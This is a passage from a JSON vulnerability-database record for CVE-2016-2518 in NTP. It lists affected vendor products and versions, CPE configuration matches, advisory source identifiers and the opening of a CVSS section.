"8.0.1.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system e-series blade server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.2" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.4.0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.26" }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.12" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wap371 wireless access point", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.5.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1210" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8.3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sentinel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "BID", "id": "88226" }, { "db": "JVNDB", "id": "JVNDB-2016-007714" }, { "db": "NVD", "id": "CVE-2016-2518" }, { "db": "CNNVD", "id": "CNNVD-201604-609" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.2.8", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.92", "versionStartIncluding": "4.3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager_for_clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:communications_user_data_repository:10.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_user_data_repository:10.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_user_data_repository:12.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:9.3:p9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.1:p9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.2:p9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:10.3:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_443-1_opc_ua_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_443-1_opc_ua:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2518" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Siemens reported these vulnerabilities to CISA.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-609" } ], "trust": 0.6 }, "cve": "CVE-2016-2518", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": 